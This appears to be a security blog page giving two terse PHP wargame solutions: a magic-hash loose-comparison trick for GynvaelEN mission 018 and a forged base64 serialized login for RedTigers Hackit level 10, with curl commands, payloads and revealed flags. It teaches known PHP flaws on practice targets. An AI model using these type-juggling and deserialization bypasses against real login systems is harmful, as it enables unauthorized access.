hacktracking: php

Showing posts with label php. Show all posts

# GynvaelEN mission 018

# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/admin.php?password1=240610708&password2=10932435112'
Welcome back dear admin.
Your flag: I'm not sure this is how equality is supposed to work.

Now try with <a href='superadmin.php'>superadmin.php</a>!

# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/superadmin.php'
...
if (hash("sha256", $_GET['password']) ==
'0e12345678901234567890123456789012345678901234567890123456789012')
...
_:)

Source

https://www.youtube.com/watch?v=adHOlKKbFXM (2:00:22)

References

https://www.whitehatsec.com/blog/magic-hashes/

# RedTigers Hackit wargame: Level 10

# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>